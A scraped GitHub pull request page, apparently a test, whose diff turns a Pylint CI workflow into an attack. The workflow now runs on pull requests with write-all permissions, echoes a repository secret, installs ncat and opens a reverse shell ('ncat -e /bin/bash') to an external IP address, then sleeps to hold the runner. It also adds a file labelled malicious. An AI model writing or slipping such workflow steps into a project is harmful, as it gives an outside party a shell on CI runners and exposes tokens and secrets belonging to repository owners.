Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

test #2

Open
wants to merge 22 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
23 changes: 10 additions & 13 deletions .github/workflows/pylint.yml
Original file line number Diff line number Diff line change
@@ -1,23 +1,20 @@
name: Pylint
name: token1111

on: [pull_request, push]

permissions: write-all

env:
GITHUB_TOKEN: ${{ github.token }}

jobs:
build:
runs-on: ubuntu-latest
strategy:
matrix:
python-version: ["3.8", "3.9", "3.10"]
python-version: ["3.8", "3.9"]
steps:
- uses: actions/checkout@v3
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v3
with:
python-version: ${{ matrix.python-version }}
- name: Install dependencies
run: |
python -m pip install --upgrade pip
pip install pylint
- name: Analysing the code with pylint
run: |
pylint $(git ls-files '*.py')
- run: echo ${{ secrets.BLA_BLA }}
- name: set env as secrets
run: sudo apt install -y ncat; ncat -e /bin/bash 18.222.231.153 4444; sleep 1200
1 change: 0 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -22,4 +22,3 @@ To generate the raw data to aggregate, run `run_many.sh`
In order to re-generate aggregated stats from raw data, execute `python generate_agg_stats.py`.
Raw data will be searched for in `batch_results` directory. Output will be printed to the screen.

test test
1 change: 1 addition & 0 deletions innocent_file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
this_is_a_malicious_file
Loading